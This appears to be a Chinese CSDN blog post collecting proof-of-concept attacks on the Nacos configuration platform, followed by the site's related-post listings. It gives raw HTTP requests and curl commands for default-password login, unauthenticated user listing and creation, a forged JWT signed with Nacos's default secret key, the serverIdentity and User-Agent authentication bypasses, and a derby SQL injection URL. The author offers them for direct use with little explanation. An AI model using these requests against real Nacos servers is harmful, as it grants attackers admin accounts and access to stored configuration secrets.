【poc整合】Nacos漏洞整理(上)——弱口令、未授权访问、JWT利用、未授权添加用户、身份验证绕过、derby SQL注入(漏洞更新截止2024.9.12)

于 2024-09-13 09:00:00 发布
阅读量136 收藏 2
点赞数 5
分类专栏: POC整合 SRC挖掘 web安全 文章标签: sql 数据库 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62783065/article/details/142186402
版权

后面要开一个新的系列,主要是做各个中间件、cms、框架的漏洞集合,把每个漏洞都总结,网上能搜到的利用方法一堆,就是给poc磨磨唧唧,在这里不墨迹,直接上poc,利用方法原理随便去搜,各位看poc看爽了记得给个关注点个赞给个收藏,感谢各位师傅。

获取nacos版本信息

/nacos/v1/console/server/state

弱口令

默认账号密码都是nacos

未授权访问

auth

产生原因,配置文件nacos.core.auth.enabled = false

查看用户:http://xxx/nacos/v1/auth/users?pageNo=1&pageSize=1

添加用户:

POST /nacos/v1/auth/users HTTP/1.1

username=test1&password=test1

JWT QVD-2023-6271

利用版本:nacos <=2.2.0

产生原因,虽然nacos.core.auth.enabled = true,但是未修改默认nacosKeynacos.core.auth.default.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789

JWT设置Header为HS256,payload中exp为较大时间戳(比如当前时间+5小时后的时间)unix时间戳转换的结果,签名就是用前面的key并且base64编码

获得登录的JSESSIONID:

POST /nacos/v1/auth/users/login HTTP/1.1
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcxMTM1NTEwMH0.zKH8OPXeQP6Eo7tMVPVb09Kb7RiI63ydLqUt57MOlsI

username=admin&password=admin

拿到JSESSIONID添加到这个请求里,再请求就登录成功了

identity

利用版本:Nacos <= 2.2.0

产生原因,配置文件写了nacos.core.auth.server.identity.key=serverIdentity以及nacos.core.auth.server.identity.value=security

添加用户:

POST /nacos/v1/auth/users HTTP/1.1
serverIdentity: security

username=test&password=test

userAgent CVE-2021-29441

利用版本:Nacos <= 1.4.1

产生原因,配置文件nacos.core.auth.enable.userAgentAuthWhite=true

GET /nacos/v1/auth/users?pageNo=1&pageSize=9&accessToken= HTTP/1.1
User-Agent: Nacos-Serverver

修复之后产生一个新问题,可以在users后面添加/绕过校验

比如:

  • 访问用户列表curl XGET 'http://127.0.0.1:8848/nacos/v1/auth/users/?pageNo=1&pageSize=9 --path-as-is'

  • 添加新用户curl -XPOST 'http://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test'

derby SQL注入 CNVD-2020-67618

Poc:http://xxx/nacos/v1/cs/ops/derby?sql=select%20*%20from%20users%20

webfker from 0 to 1
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
服务攻防——数据库安全授权访问弱口令
m0_61506558的博客
12-14 568
关于判断服务是否开放进行信息收集的内容,可能通过扫描工具,如果遇到WAF的话,通过常用搭建网站的组件进行尝试,或者通过特定服务提供的报错信息进行判断......由于基于 Erlang 的 JSON 解析器和基于 JavaScript 的 JSON 解析器的差异,在 1.7.0 之前的 Apache CouchDB 和 2.1.1 之前的 2.x 中,可以提交_users具有重复键的文档,roles用于数据库内的访问控制,包括特例_admin角色,表示管理用户
非常专业的漏洞POC管理、团队授权漏洞管理、漏洞验证利用漏洞批量利用框架 -Un1kPoc.zip
08-26
非常专业的漏洞POC管理、团队授权漏洞管理、漏洞验证利用漏洞批量利用框架。_Un1kPoc.zip 非常专业的漏洞POC管理、团队授权漏洞管理、漏洞验证利用漏洞批量利用框架。_Un1kPoc.zip 非常专业的漏洞POC管理、...
Alibaba Nacos权限认证绕过漏洞复现
逍遥小哥的博客
07-18 6608
是一个易于使用的平台,旨在用于动态服务发现,配置和服务管理。它可以帮助您轻松构建云本机应用程序和。2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的授权访问漏洞。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。为什么会产生这个漏洞?1.认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。
Nacos身份认证绕过漏洞(QVD-2023-6271)
热门推荐
qq_50854662的博客
03-20 1万+
漏洞原理为开源服务管理平台 Nacos在默认配置下对 token.secret.key 进行修改,导致远程攻击者可以绕过密钥认证进入后台造成系统受控等后果。
nacos系列漏洞复现总结
内心不种满鲜花就会长满杂草
09-05 1219
Nacos支持两种启动模式:单机模式和集群模式。
NACOS漏洞深入解析(审计+复现)
qq_49849300的博客
03-27 5066
目前攻防对抗实战中,Nacos的环境遇到非常多,并且无一例外都没有开启auth,很多防守方甚至只是用防火墙阻断网上公开的那几条exp利用的关键地址,Nacos里面保存了企业很多的配置文件比如数据库连接信息、AK/SK信息等等,拿到账号密码等信息之后用来做密码本,然后再进行内网横向,杀伤力非常之大。看一下/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigController.java文件中369行开始的代码。
NACOS身份认证绕过漏洞批量检测poc.7z
02-24
该“NACOS身份认证绕过漏洞批量检测poc”是一个Proof of Concept(概念验证)文件,用于验证这个安全漏洞是否存在。POC文件通常包含一段代码或者脚本,开发者或安全研究人员可以使用这些代码来测试特定系统是否易受...
Celery 4.0 Redis授权访问+Pickle反序列化利用(celery3_redis_unauth)POC
09-29
Celery 4.0 Redis授权访问+Pickle反...Celery 版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在授权访问问题时,可利用Pickle反序列化漏洞执行任意代码。
通达OA的授权、有限制授权、upload——rce的poc.rar
09-02
POC1(授权登录+upload rce).py是一个证明概念(Proof of Concept,POC)脚本,它演示了如何利用这个漏洞进行授权登录,并且结合了上传RCE的能力。 接着,我们讨论“upload——rce”,即上传远程执行代码漏洞...
sqlalchemy JSON 字段写入时中文序列化问题
最新发布
llc的博客
09-12 185
_table_args__ = ({"comment": "表名称"})...extra = Column(JSON, comment="其他属性")...
被低估的SQL
weixin_61431494的博客
09-03 1703
虽然SQL的核心功能强大,但自定义函数和存储过程常常被低估。它们可以封装复杂的业务逻辑,从而提高数据库操作的效率和一致性。存储过程不仅可以接收参数,还能执行多条SQL语句,并处理事务。ASBEGIN-- 可能的其他初始化操作END;这种封装能够保证操作的原子性,同时提升了数据库应用的性能和安全性。
在 Red Hat 上安装 SQL Server 2022 并创建数据库
2301_76664379的博客
09-12 930
本快速入门介绍如何在 Red Hat Enterprise Linux (RHEL) 8.x 或 9.x 上安装 SQL Server 2022 (16.x)。然后可以使用 sqlcmd 进行连接,创建第一个数据库并运行查询。注意:本教程需要用户输入和 Internet 连接。必须拥有 RHEL 8.x 计算机(内存至少为 2 GB)。如果以前安装了 SQL Server 的社区技术预览版 (CTP) 或候选发布 (RC) 版本,则必须先删除旧存储库,然后再执行这些步骤。
小记XML写sql的聚合函数用法
2301_76162638的博客
09-09 297
手动查出需要用于查询、展示的字段用法:(需要GROUP BY) 将每个岗位下的姓名合并为一个以逗号分隔的字符串的结果有长度限制,默认情况下是 1024 个字符,可以通过调整系统变量来增加这个限制。
SQLServer分组查询
NaZiMeKiY的博客
09-08 459
例如我们再在日期后加入一个总人数在3人及以上的限制,那么就会用到聚合函数count(),但是where中是不能使用聚合函数作为限制条件的,所以我们需要用到having关键字。注意点:在分组查询中除了使用聚合函数的数据和使用group by和select后面的分组之外,数据都无法作为一列显示。可以不断使用union链接,但是相对应的是代码实在太过繁琐,所以我们还是使用group by的方式进行分组。五.在使用分组查询时添加多个限制条件,并且使用到聚合函数。例如我们加上一个出生日期的限制,只统计00后的数据。
大数据-132 - Flink SQL 基本介绍 与 HelloWorld案例
永远好奇,无限进步!
09-12 1375
Flink SQL 是 Apache Flink 提供的一种高层次的查询语言接口,它基于 SQL 标准,为开发者提供了处理流式数据和批处理数据的能力。Flink SQL 允许用户使用标准 SQL 查询语言在数据流和数据表上执行复杂的操作,适用于多种应用场景,如实时分析、数据流处理、机器学习等。Flink SQL 的一大特点是流处理和批处理的统一性。通过同一套 SQL 语法,用户可以同时处理静态数据(批处理)和动态数据(流处理)。这使得应用程序的开发更加简化,因为可以用相同的逻辑编写实时流数据处理和历史数据的
RocketMQ出现The broker does not support consumer to filter message by SQL92
山不见我,我自见山
09-12 139
然后通过rocketmq-console来查看,集群中的这个属性是否为true,为true就可以了。在使用RocketMQ使用SQL过滤消息的时候,出现下面错误。原因是我们的配置文件没有开启SQL过滤功能,我们需要在。接着我们重启namesrv与broker服务就解决问题。配置文件中添加下面命令。
RB-SQL利用检索LLM框架处理大型数据库和复杂多表查询的NL2SQL
AwaysLine
09-10 562
利用密集型段落检索(Dense Passage Retrieval, DPR)模型来检索相关表格、列和示例,以构建有效的提示工程。此外,框架还引入了SQL骨架作为示例组织中的中间步骤,以指导正确的SQL生成过程。表格检索器从数据库中筛选表格,列检索器进一步筛选列。SQL框架检索器用于选择相似的少量示例,并将SQL框架添加到示例组织中。:搜索具有相似SQL骨架的少量示例,并将SQL骨架引入示例组织,以增强上下文学习过程。该模块计算问题与表格之间的相似度,并检索与问题高度相关的表格。(b) 列检索器的框架。
TinyWebSever源码逐行注释(六)_ sql_connection.cpp
qq_39969848的博客
09-09 350
Linux下C++轻量级Web服务器,助力初学者快速实践网络编程,搭建属于自己的服务器.sql_connection.cpp用于实现数据库的连接池。
nacos身份认证绕过漏洞批量检测poc
06-23
### 回答1: Nacos是一种开源的配置中心和服务发现平台,可以帮助开发者更方便地管理微服务架构。然而,最近在Nacos中发现了一个名为身份认证绕过漏洞,这使得攻击者可以绕过身份验证,执行恶意操作。 为了帮助企业和个人快速检测到这个安全漏洞,并采取相应的补救措施,一些安全研究者开发了批量检测POC。这个POC利用公开的漏洞信息,测试Nacos的登录和注册功能,以确定Nacos是否存在身份认证绕过漏洞。 使用这个批量检测POC用户可以将所有的IP地址列表保存到一个文本文件中,然后通过简单的命令行选项传递该文本文件的路径。这个POC将自动扫描并验证每个IP地址是否容易受到身份认证绕过漏洞的攻击。 总体来说,这个批量检测POC提供了一种简单、快速、有效的方式,帮助企业和个人识别并修复Nacos中的身份认证绕过漏洞,从而提高系统的安全性和可靠性。同时,这也反映了业界对于技术安全的持续关注和努力。 ### 回答2: nacos是一个云原生的动态服务发现和配置管理平台,但是在nacos中存在着身份认证绕过漏洞,攻击者可以通过此漏洞直接绕过身份验证,获取到nacos的管理权限。为了防止此漏洞被滥用,需要及时对其进行检测和修复。 Nacos身份认证绕过漏洞批量检测可以采用Poc技术进行,Poc即Proof of Concept,意为概念证明。通过编写Poc代码,可以在不影响正常运行的情况下,模拟攻击行为,发现漏洞并进行修复。 对于nacos身份认证绕过漏洞批量检测Poc,可以通过以下步骤实现: 1. 首先,确定目标,即需要检测的nacos服务地址。可以通过搜索引擎、网络扫描等方式获取目标。 2. 编写Poc代码,对目标进行检测。具体步骤如下: (1)通过无需认证的接口验证目标是否存在身份认证绕过漏洞。 (2)如果存在漏洞,则可以使用管理员权限执行恶意操作,如读取、修改、删除配置文件等。 3. 对漏洞进行修复。修补漏洞的方法是将nacos系统更新至最新版本,并且配置正确,以避免任何安全问题。 通过进行nacos身份认证绕过漏洞批量检测Poc,可以及时发现和修复nacos系统中的漏洞问题,从而提高系统的安全性和稳定性。同时,作为云原生的重要组件之一,nacos系统的安全问题也需要得到更高的重视和加强保护。 ### 回答3: Nacos是一种开源的分布式服务发现、配置和管理平台,最近出现了一个身份认证绕过漏洞。攻击者可以利用漏洞绕过Nacos身份验证,实现授权访问敏感信息或执行恶意操作。为了增强安全性,开发人员需要尽快修补漏洞。 为方便安全研究人员和开发人员识别漏洞,可以使用批量检测pocpoc是Proof of Concept的缩写,通常是指一段代码或脚本,用来验证漏洞是否存在的可复现方式。通过使用poc,可以确认漏洞的确存在,便于修复。 对于Nacos身份认证绕过漏洞,可以使用poc进行批量检测。首先需要构造一份包含有效用户名和密码的列表,然后使用pocNacos进行检测。如果检测到漏洞,则会产生警报或输出,方便管理员及时修复漏洞。 因此,在使用Nacos时,开发人员需要及时修复漏洞,并通过poc等方式进行漏洞检测,以便及时发现和修复其他潜在的安全漏洞,提高系统的安全性和可靠性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

webfker from 0 to 1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值